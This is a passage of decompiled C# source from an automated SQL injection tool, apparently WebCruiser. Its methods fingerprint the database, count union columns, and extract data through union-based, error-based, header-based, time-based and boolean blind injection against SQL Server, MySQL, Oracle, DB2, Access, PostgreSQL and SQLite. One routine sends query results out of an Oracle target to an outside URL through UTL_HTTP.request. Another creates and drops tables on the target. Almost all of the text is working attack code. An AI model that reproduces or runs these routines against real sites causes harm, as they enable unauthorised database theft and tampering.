				if (string.IsNullOrEmpty(keyWordBySource) && isIncludeCurrentKeyword(sourceCodeWithEscapeSpaceOption2))
				{
					string sourceCodeWithEscapeSpaceOption3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					string keyWordBySource2 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption2, sourceCodeWithEscapeSpaceOption3);
					if (!string.IsNullOrEmpty(keyWordBySource2))
					{
						mainfrm.CurrentSite.DatabaseType = DBType.SQLite;
						UpdateComboDBType("SQLite");
						InitByDBType(IsLoadFromFile: false);
						return DBType.SQLite;
					}
				}
				MessageBox.Show("* Get Database Type Failed! \r\n* Please Select the DB Type manually!", "Information");
				return DBType.UnKnown;
			}
			catch
			{
				return DBType.UnKnown;
			}
			finally
			{
				vulnSQL.vulnDatabaseType = mainfrm.CurrentSite.DatabaseType;
				mainfrm.DisplayLogList("Got Database Type: " + mainfrm.CurrentSite.DatabaseType);
			}
		}

		private string GetItemBySQLServerPlainText(string ItemName)
		{
			//IL_0054: Unknown result type (might be due to invalid IL or missing references)
			//IL_005a: Expected O, but got Unknown
			while (mainfrm.CurrentSite.HTTPThreadNum > 1)
			{
				Thread.Sleep(500);
			}
			string uRL = vulnSQL.vulnActionUrl + vulnSQL.vulnPrefix + ItemName + vulnSQL.vulnPostfix;
			Regex val = new Regex(vulnSQL.vulnRegex, (RegexOptions)18);
			string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, vulnSQL.vulnRequestType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			string value = ((Capture)val.Match(sourceCodeWithEscapeSpaceOption)).get_Value();
			if (!string.IsNullOrEmpty(value))
			{
				return value;
			}
			return "";
		}

		private string GetItemByFieldEcho(string SelectExpression, string ItemName, string FromExpression, bool NeedTempTable)
		{
			//IL_040c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0413: Expected O, but got Unknown
			while (mainfrm.CurrentSite.HTTPThreadNum > 1)
			{
				Thread.Sleep(500);
			}
			string text = "";
			string text2 = "";
			for (int i = 0; i < mainfrm.CurrentSite.unionFieldIndex - 1; i++)
			{
				text = ((!string.IsNullOrEmpty(text)) ? (text + "," + WildField) : ((mainfrm.CurrentSite.DatabaseType != DBType.DB2) ? WildField : "1"));
			}
			if (!string.IsNullOrEmpty(text))
			{
				text += ",";
			}
			for (int j = 0; j < mainfrm.CurrentSite.unionFieldsCount - mainfrm.CurrentSite.unionFieldIndex; j++)
			{
				text2 = text2 + "," + WildField;
			}
			string text3 = "";
			string text4 = "";
			if (NeedTempTable)
			{
				TempTbNum++;
				string text5 = "WCRTEMP" + $"{TempTbNum:D5}";
				text3 = URL + PreFix + ";create table " + text5 + "(tmp varchar(255));insert into " + text5 + "%20" + SelectExpression + "%20" + ItemName + "%20" + FromExpression + "%3B" + CommentString;
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				text4 = GetItemByFieldEcho("select%20top%201%20", "tmp", "from%20" + text5, NeedTempTable: false);
				text3 = URL + PreFix + ";drop table " + text5 + "%3B" + CommentString;
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (!string.IsNullOrEmpty(text4))
				{
					mainfrm.DisplayLogList("Got Item: " + text4);
					return text4;
				}
				return GetItemByFieldEcho(SelectExpression, ItemName, FromExpression, NeedTempTable: false);
			}
			string text6 = "";
			if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
			{
				text6 = "char(33)%2Bchar(83)%2Bchar(33)%2B(" + ItemName + ")%2Bchar(33)%2Bchar(69)%2Bchar(33)";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				text6 = "concat(0x215321," + ItemName + ",0x214521)";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle || mainfrm.CurrentSite.DatabaseType == DBType.DB2 || mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
			{
				text6 = "chr(33)||chr(83)||chr(33)||" + ItemName + "||chr(33)||chr(69)||chr(33)";
			}
			else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
			{
				text6 = "chr(33)%2Bchr(83)%2Bchr(33)%2B(" + ItemName + ")%2Bchr(33)%2Bchr(69)%2Bchr(33)";
			}
			else
			{
				if (mainfrm.CurrentSite.DatabaseType != DBType.SQLite)
				{
					return "";
				}
				text6 = "char(33,83,33)||(" + ItemName + ")||char(33,69,33)";
			}
			text3 = URL + PreFix + "%20and%201=2%20union%20all%20" + SelectExpression + "%20" + text + text6 + text2 + "%20" + FromExpression + CommentString;
			Regex val = new Regex("(?<=(!S!))[\\s\\S]*?(?=(!E!))", (RegexOptions)18);
			for (int k = 0; k < 2; k++)
			{
				string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				text4 = ((Capture)val.Match(sourceCodeWithEscapeSpaceOption)).get_Value();
				mainfrm.DisplayLogList("Got Item: " + text4);
				if (!string.IsNullOrEmpty(text4))
				{
					return text4;
				}
			}
			return "";
		}

		private string GetItemByCrossSite(string SelectExpression, string ItemName, string FromExpression)
		{
			while (mainfrm.CurrentSite.HTTPThreadNum > 0)
			{
				Thread.Sleep(500);
			}
			string uRL = URL + PreFix + "%20" + LogicOperator + "%20UTL_HTTP.request(" + mainfrm.CurrentSite.EscapeSingleQuotes(WCRSetting.CrossSiteURL, DBType.Oracle) + "||(" + SelectExpression + "%20" + ItemName + "%20" + FromExpression + "))=1" + CommentString;
			mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			string sourceCode = mainfrm.CurrentSite.GetSourceCode(WCRSetting.CrossSiteRecord, RequestType.GET, Encoding.UTF8, vulnSQL.needEscapeSpace);
			mainfrm.DisplayLogList("Getting Item: " + sourceCode + " - By CrossSite Injection.");
			return sourceCode;
		}

		private string GetItemFromPlainTextCode(string SourceCode)
		{
			//IL_0007: Unknown result type (might be due to invalid IL or missing references)
			//IL_000d: Expected O, but got Unknown
			Regex val = new Regex("(?<=(!S!))[\\s\\S]*?(?=(!E!))", (RegexOptions)18);
			return ((Capture)val.Match(SourceCode)).get_Value();
		}

		private ParameterType GetParameterType()
		{
			//IL_003e: Unknown result type (might be due to invalid IL or missing references)
			InitURL();
			if (URL.LastIndexOf('=') < 0)
			{
				mainfrm.CurrentSite.paramType = ParameterType.NotInjectable;
				if (mainfrm.ReqType == RequestType.GET)
				{
					MessageBox.Show("* It's not injectable! Please check the URL format and Request Type: GET/POST/COOKIE!\r\n* Example: http://127.0.0.1/view.jsp?user=admin\r\n* If it exists search forms in current page, please input % or other mainfrm.CurrentSite.CurrentKeyWord and submit it! Then Check the radiobutton \"Search\" and Retry!", "Infomation");
				}
			}
			else if (Regex.IsMatch(URL.Substring(URL.LastIndexOf('=') + 1), "^[\\d\\-]+$"))
			{
				mainfrm.CurrentSite.paramType = ParameterType.Integer;
			}
			else
			{
				mainfrm.CurrentSite.paramType = ParameterType.String;
			}
			return mainfrm.CurrentSite.paramType;
		}

		private int GetFieldEchoNum(string URL)
		{
			int num = -1;
			try
			{
				mainfrm.DisplayLogList("Getting the number of fields in SQL ...");
				if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
				{
					mainfrm.CurrentSite.paramType = GetParameterType();
				}
				if (mainfrm.CurrentSite.paramType == ParameterType.UnKnown)
				{
					return -1;
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
				{
					mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
				}
				string text = "";
				bool flag = true;
				if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					text = "%20from%20dual";
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
				{
					text = "%20from%20sysibm.sysdummy1";
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					if (ExistedTableInAccess.Equals("NULL"))
					{
						flag = false;
					}
					else
					{
						text = "%20from%20" + ExistedTableInAccess;
					}
				}
				string text2 = "";
				string text3 = "";
				string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(URL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				string text4 = "";
				string text5 = "";
				if (flag)
				{
					for (int i = 0; i < 100; i++)
					{
						if (!string.IsNullOrEmpty(text2))
						{
							text2 = ((mainfrm.CurrentSite.DatabaseType != DBType.DB2) ? (text2 + ",NULL") : (text2 + ",chr(97)"));
						}
						else
						{
							text2 = "NULL";
							if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
							{
								text2 = "1";
							}
						}
						text3 = URL + PreFix + "%20union%20all%20select " + text2 + text + CommentString;
						text4 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
						text5 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, text4);
						if (string.IsNullOrEmpty(text5))
						{
							num = i + 1;
							return num;
						}
					}
				}
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer || mainfrm.CurrentSite.DatabaseType == DBType.Oracle || mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					for (int j = 2; j < 128; j++)
					{
						text3 = URL + PreFix + "%20order%20by%20" + j + CommentString;
						text4 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text3, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
						text5 = WebSite.GetKeyWordBySource(sourceCodeWithEscapeSpaceOption, text4);
						if (!string.IsNullOrEmpty(text5))
						{
							num = j - 1;
							return num;
						}
					}
				}
				return -1;
			}
			catch
			{
				return -1;
			}
			finally
			{
				if (num > 0)
				{
					mainfrm.DisplayLogList("Got field number: " + num);
				}
			}
		}

		private int GetFieldEchoIndex(int FieldNum)
		{
			int num = -1;
			try
			{
				mainfrm.DisplayLogList("Checking if there is an injectale field in SQL ...");
				for (int i = 0; i < FieldNum; i++)
				{
					string text = "";
					string text2 = "";
					for (int j = 0; j < i; j++)
					{
						if (string.IsNullOrEmpty(text))
						{
							text = WildField;
							if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
							{
								text = "1";
							}
						}
						else
						{
							text = text + "," + WildField;
						}
					}
					if (!string.IsNullOrEmpty(text))
					{
						text += ",";
					}
					for (int k = 0; k < FieldNum - i - 1; k++)
					{
						text2 = text2 + "," + WildField;
					}
					string text3 = "";
					text3 = mainfrm.CurrentSite.EscapeSingleQuotes("WCRWVS", mainfrm.CurrentSite.DatabaseType);
					string text4 = "";
					if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
					{
						text4 = "%20from dual";
					}
					else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
					{
						text4 = "%20from sysibm.sysdummy1";
					}
					else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
					{
						if (ExistedTableInAccess.Equals("NULL"))
						{
							return -1;
						}
						text4 = "%20from%20" + ExistedTableInAccess + "%00";
					}
					string uRL = URL + PreFix + "%20and%201=2%20union%20all%20select%20" + text + text3 + text2 + text4 + CommentString;
					string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
					if (string.IsNullOrEmpty(sourceCodeWithEscapeSpaceOption))
					{
						return -1;
					}
					if (sourceCodeWithEscapeSpaceOption.IndexOf("WCRWVS") >= 0)
					{
						num = i + 1;
						return num;
					}
				}
				return -1;
			}
			catch
			{
				return -1;
			}
			finally
			{
				if (num >= 0)
				{
					mainfrm.DisplayLogList("Got Union index: " + num);
				}
			}
		}

		private string GetItemByOraclePlainText(string ItemName)
		{
			//IL_009e: Unknown result type (might be due to invalid IL or missing references)
			//IL_00a4: Expected O, but got Unknown
			while (mainfrm.CurrentSite.HTTPThreadNum > 1)
			{
				Thread.Sleep(500);
			}
			string uRL = URL + PreFix + "||utl_inaddr.get_host_name((chr(33)||chr(83)||chr(33)||(" + ItemName + ")||chr(33)||chr(69)||chr(33)))" + CommentString;
			string sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			Regex val = new Regex("(?<=(!S!))[\\s\\S]*?(?=(!E!))", (RegexOptions)18);
			string value = ((Capture)val.Match(sourceCodeWithEscapeSpaceOption)).get_Value();
			if (!string.IsNullOrEmpty(value))
			{
				return value;
			}
			uRL = URL + PreFix + "%20" + LogicOperator + "%20ctxsys.drithsx.sn(1,(chr(33)||chr(83)||chr(33)||(" + ItemName + ")||chr(33)||chr(69)||chr(33)))=1" + CommentString;
			sourceCodeWithEscapeSpaceOption = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			return ((Capture)val.Match(sourceCodeWithEscapeSpaceOption)).get_Value();
		}

		private string GetItemByMySQLPlainText(string ItemName, int MaxLength)
		{
			//IL_01b3: Unknown result type (might be due to invalid IL or missing references)
			//IL_01ba: Expected O, but got Unknown
			while (mainfrm.CurrentSite.HTTPThreadNum > 1)
			{
				Thread.Sleep(500);
			}
			if (MaxLength <= 62)
			{
				string text = "";
				string text2 = "";
				if (vulnSQL.vulnInjectMethod == InjectMethod.ErrorBased)
				{
					text = vulnSQL.vulnActionUrl + vulnSQL.vulnPrefix + ItemName + vulnSQL.vulnPostfix;
					text2 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text, vulnSQL.vulnRequestType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				}
				else if (vulnSQL.vulnInjectMethod == InjectMethod.ErrorBasedUserAgent)
				{
					text = vulnSQL.vulnActionUrl;
					string text3 = "WebCruiser" + vulnSQL.vulnPrefix + ItemName + vulnSQL.vulnPostfix;
					text3 = text3.Replace("%20", " ");
					text2 = mainfrm.CurrentSite.GetSourceCodeWithCustomHeader(text, vulnSQL.vulnRequestType, text3, "", vulnSQL.vulnPostEncType);
				}
				else if (vulnSQL.vulnInjectMethod == InjectMethod.ErrorBasedReferer)
				{
					text = vulnSQL.vulnActionUrl;
					string text4 = WebSite.URL2NoParaURL(vulnSQL.vulnActionUrl) + vulnSQL.vulnPrefix + ItemName + vulnSQL.vulnPostfix;
					text4 = text4.Replace("%20", " ");
					text2 = mainfrm.CurrentSite.GetSourceCodeWithCustomHeader(text, vulnSQL.vulnRequestType, "", text4, vulnSQL.vulnPostEncType);
				}
				Regex val = new Regex(vulnSQL.vulnRegex, (RegexOptions)18);
				string value = ((Capture)val.Match(text2)).get_Value();
				if (!string.IsNullOrEmpty(value))
				{
					return value;
				}
				return "";
			}
			int num = 1;
			int num2 = MaxLength;
			string text5 = "";
			while (num2 > 0)
			{
				string text6 = "";
				if (num2 <= 62)
				{
					text6 = "substr((" + ItemName + ")," + num + ")";
					num2 = 0;
				}
				else
				{
					text6 = "substr((" + ItemName + ")," + num + ",62)";
					num += 62;
					num2 -= 62;
				}
				text5 += GetItemByMySQLPlainText(text6, 62);
			}
			return text5;
		}

		private void GetInjectMethod(string URL)
		{
			GetBlindLocked = true;
			try
			{
				mainfrm.DisplayLogList("Trying Injection Method ...");
				if (mainfrm.CurrentSite.DatabaseType == DBType.UnKnown)
				{
					mainfrm.CurrentSite.DatabaseType = GetDBType(URL);
				}
				string itemByOraclePlainText;
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
				{
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount < 0)
					{
						goto IL_052c;
					}
					int fieldEchoIndex = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex < 0)
					{
						goto IL_052c;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex;
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
				{
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount <= 0)
					{
						goto IL_052c;
					}
					int fieldEchoIndex2 = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex2 <= 0)
					{
						goto IL_052c;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex2;
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					itemByOraclePlainText = GetItemByOraclePlainText(mainfrm.CurrentSite.EscapeSingleQuotes("WCRWVS", DBType.Oracle));
					if (itemByOraclePlainText.Equals("WCRWVS"))
					{
						mainfrm.CurrentSite.injectMethod = InjectMethod.ErrorBased;
						return;
					}
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount <= 0)
					{
						goto IL_0248;
					}
					int fieldEchoIndex3 = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex3 <= 0)
					{
						goto IL_0248;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex3;
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
				{
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount <= 0)
					{
						goto IL_052c;
					}
					int fieldEchoIndex4 = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex4 <= 0)
					{
						goto IL_052c;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex4;
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					while (mainfrm.CurrentSite.HTTPThreadNum > 0)
					{
						Thread.Sleep(500);
					}
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount < 0)
					{
						goto IL_052c;
					}
					int fieldEchoIndex5 = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex5 < 0)
					{
						goto IL_052c;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex5;
				}
				else
				{
					if (mainfrm.CurrentSite.unionFieldsCount == 0)
					{
						mainfrm.CurrentSite.unionFieldsCount = GetFieldEchoNum(URL);
					}
					if (mainfrm.CurrentSite.unionFieldsCount <= 0)
					{
						goto IL_052c;
					}
					int fieldEchoIndex6 = GetFieldEchoIndex(mainfrm.CurrentSite.unionFieldsCount);
					if (fieldEchoIndex6 <= 0)
					{
						goto IL_052c;
					}
					mainfrm.CurrentSite.injectMethod = InjectMethod.UnionBased;
					mainfrm.CurrentSite.unionFieldIndex = fieldEchoIndex6;
				}
				goto end_IL_0007;
				IL_0248:
				string uRL = URL + PreFix + "%20" + LogicOperator + "%20UTL_HTTP.request(" + mainfrm.CurrentSite.EscapeSingleQuotes(WCRSetting.CrossSiteURL + mainfrm.CurrentSite.DomainHost, DBType.Oracle) + ")=1" + CommentString;
				mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(uRL, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				itemByOraclePlainText = mainfrm.CurrentSite.GetSourceCode(WCRSetting.CrossSiteRecord, RequestType.GET, Encoding.UTF8, vulnSQL.needEscapeSpace);
				if (!itemByOraclePlainText.Equals(mainfrm.CurrentSite.DomainHost))
				{
					goto IL_052c;
				}
				mainfrm.CurrentSite.injectMethod = InjectMethod.CrossSiteBased;
				goto end_IL_0007;
				IL_052c:
				if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
				{
					mainfrm.CurrentSite.injectMethod = InjectMethod.BooleanBased;
				}
				end_IL_0007:;
			}
			catch
			{
			}
			finally
			{
				vulnSQL.vulnInjectMethod = mainfrm.CurrentSite.injectMethod;
				if (vulnSQL.vulnInjectMethod == InjectMethod.UnionBased)
				{
					vulnSQL.unionFieldsCount = mainfrm.CurrentSite.unionFieldsCount;
					vulnSQL.unionFieldIndex = mainfrm.CurrentSite.unionFieldIndex;
				}
				GetBlindLocked = false;
				mainfrm.DisplayLogList("Got: " + mainfrm.CurrentSite.injectMethod);
			}
		}

		private string GetTreeViewDBText(string TreeInfo)
		{
			try
			{
				if (!((Control)treeViewDB).get_InvokeRequired())
				{
					string[] array = TreeInfo.Split(new char[1]
					{
						'^'
					});
					switch (array.Length - 1)
					{
					case 0:
					{
						int num6 = int.Parse(array[0]);
						return treeViewDB.get_Nodes().get_Item(num6).get_Text();
					}
					case 1:
					{
						int num4 = int.Parse(array[0]);
						int num5 = int.Parse(array[1]);
						return treeViewDB.get_Nodes().get_Item(num4).get_Nodes()
							.get_Item(num5)
							.get_Text();
					}
					case 2:
					{
						int num = int.Parse(array[0]);
						int num2 = int.Parse(array[1]);
						int num3 = int.Parse(array[2]);
						return treeViewDB.get_Nodes().get_Item(num).get_Nodes()
							.get_Item(num2)
							.get_Nodes()
							.get_Item(num3)
							.get_Text();
					}
					default:
						return "";
					}
				}
				DDReadTree dDReadTree = GetTreeViewDBText;
				return (string)((Control)this).Invoke((Delegate)dDReadTree, new object[1]
				{
					TreeInfo
				});
			}
			catch
			{
				return "";
			}
		}

		private string GetAExistedTableByAccess()
		{
			if (string.IsNullOrEmpty(ExistedTableInAccess))
			{
				string treeViewDBText = GetTreeViewDBText("0^0");
				if (string.IsNullOrEmpty(treeViewDBText))
				{
					return "NULL";
				}
				return treeViewDBText;
			}
			return ExistedTableInAccess;
		}

		private int GetIntValueByAccess(string SelectExpression, string IntItemExpression, string FromExpression, int MaxNum, int MinNum)
		{
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
			{
				string text = "";
				text = GetItemByFieldEcho(SelectExpression, "cstr(" + IntItemExpression + ")", FromExpression, NeedTempTable: false);
				if (!string.IsNullOrEmpty(text) && Regex.IsMatch(text, "^\\d+$"))
				{
					int num = int.Parse(text);
					if (num >= 0)
					{
						return num;
					}
				}
			}
			mainfrm.CurrentSite.CurrentKeyWord = GetKeyWord(URL, skipScanned: true);
			if (string.IsNullOrEmpty(mainfrm.CurrentSite.CurrentKeyWord))
			{
				return -1;
			}
			string text2 = "";
			string text3 = "";
			int result = -1;
			string text4 = SelectExpression + " " + IntItemExpression + " " + FromExpression;
			text2 = URL + PreFix + " " + LogicOperator + " (" + text4 + ")>" + MaxNum + PostFix;
			text3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
			if (string.IsNullOrEmpty(text3))
			{
				return -1;
			}
			if (isIncludeCurrentKeyword(text3))
			{
				return -1;
			}
			do
			{
				text2 = URL + PreFix + " " + LogicOperator + " (" + text4 + ")=" + (MaxNum + MinNum) / 2 + PostFix;
				text3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (string.IsNullOrEmpty(text3))
				{
					text3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				}
				if (string.IsNullOrEmpty(text3))
				{
					return -1;
				}
				if (isIncludeCurrentKeyword(text3))
				{
					return (MaxNum + MinNum) / 2;
				}
				text2 = URL + PreFix + " " + LogicOperator + " (" + text4 + ")<" + (MaxNum + MinNum) / 2 + PostFix;
				text3 = mainfrm.CurrentSite.GetSourceCodeWithEscapeSpaceOption(text2, mainfrm.ReqType, vulnSQL.needEscapeSpace, vulnSQL.vulnPostEncType);
				if (string.IsNullOrEmpty(text3))
				{
					return -1;
				}
				if (!isIncludeCurrentKeyword(text3))
				{
					MinNum = ((MinNum != (MaxNum + MinNum) / 2) ? ((MaxNum + MinNum) / 2 + 1) : (MinNum + 1));
				}
				else
				{
					MaxNum = (MaxNum + MinNum) / 2 - 1;
				}
			}
			while (MinNum <= MaxNum);
			return result;
		}

		private int GetIntValue(string IntSQLExpression, int MaxNum, int MinNum)
		{
			if (WebSite.CurrentStatus == TaskStatus.Stop)
			{
				return -1;
			}
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.ToBeDetect)
			{
				GetInjectMethod(URL);
			}
			if (mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBased || mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBasedUserAgent || mainfrm.CurrentSite.injectMethod == InjectMethod.ErrorBasedReferer)
			{
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
				{
					string itemBySQLServerPlainText = GetItemBySQLServerPlainText("cast((" + IntSQLExpression + ")%20as%20varchar(8))");
					try
					{
						int num = int.Parse(itemBySQLServerPlainText);
						if (num >= 0)
						{
							return num;
						}
					}
					catch
					{
					}
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
				{
					string itemByMySQLPlainText = GetItemByMySQLPlainText("cast((" + IntSQLExpression + ")%20as%20char)", 32);
					try
					{
						int num2 = int.Parse(itemByMySQLPlainText);
						if (num2 >= 0)
						{
							return num2;
						}
					}
					catch
					{
					}
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					string itemByOraclePlainText = GetItemByOraclePlainText(IntSQLExpression);
					try
					{
						int num3 = int.Parse(itemByOraclePlainText);
						if (num3 >= 0)
						{
							return num3;
						}
					}
					catch
					{
					}
				}
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.UnionBased)
			{
				string s = "";
				if (mainfrm.CurrentSite.DatabaseType == DBType.SQLServer)
				{
					s = GetItemByFieldEcho("select", "cast((" + IntSQLExpression + ")%20as%20varchar(8))", "", NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
				{
					s = GetItemByFieldEcho("select", "cast((" + IntSQLExpression + ")%20as%20char)", "", NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					s = GetItemByFieldEcho("select", "NVL(cast((" + IntSQLExpression + ")%20as%20varchar(64)),chr(32))", "from dual", NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.DB2)
				{
					s = GetItemByFieldEcho("select", "coalesce(rtrim(cast((" + IntSQLExpression + ")%20as%20char(250))),chr(32))", "from sysibm.sysdummy1", NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.Access)
				{
					s = GetItemByFieldEcho("select", "cstr(" + IntSQLExpression + ")", "from " + ExistedTableInAccess, NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.PostgreSQL)
				{
					s = GetItemByFieldEcho("select", "(" + IntSQLExpression + ")", "", NeedTempTable: false);
				}
				else if (mainfrm.CurrentSite.DatabaseType == DBType.SQLite)
				{
					s = GetItemByFieldEcho("select", "(" + IntSQLExpression + ")", "", NeedTempTable: false);
				}
				try
				{
					int num4 = int.Parse(s);
					if (num4 >= 0)
					{
						return num4;
					}
				}
				catch
				{
				}
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.CrossSiteBased)
			{
				if (mainfrm.CurrentSite.DatabaseType == DBType.Oracle)
				{
					string itemByCrossSite = GetItemByCrossSite("select", "NVL(cast((" + IntSQLExpression + ")%20as%20varchar(64)),chr(32))", "from dual");
					try
					{
						int num5 = int.Parse(itemByCrossSite);
						if (num5 >= 0)
						{
							return num5;
						}
					}
					catch
					{
					}
				}
			}
			else if (mainfrm.CurrentSite.injectMethod == InjectMethod.TimeBased && mainfrm.CurrentSite.DatabaseType == DBType.MySQL)
			{
				string uRL = URL + PreFix + "%20" + LogicOperator + "%20if((" + IntSQLExpression + ")>" + MaxNum + PostFix;
				mainfrm.CurrentSite.GetSourceCodeAndMilliSeconds(uRL, vulnSQL.vulnRequestType, out var respMilliSeconds, vulnSQL.vulnPostEncType);
				double num6 = respMilliSeconds - vulnSQL.t0InMs;
				if (num6 > 700.0)
				{
					return -1;
				}
				int result = -1;
				do
				{
					if (WebSite.CurrentStatus == TaskStatus.Stop)
					{
						return -1;
					}
					mainfrm.DisplayLogList("Test Int Range [" + MinNum + ", " + MaxNum + "]");
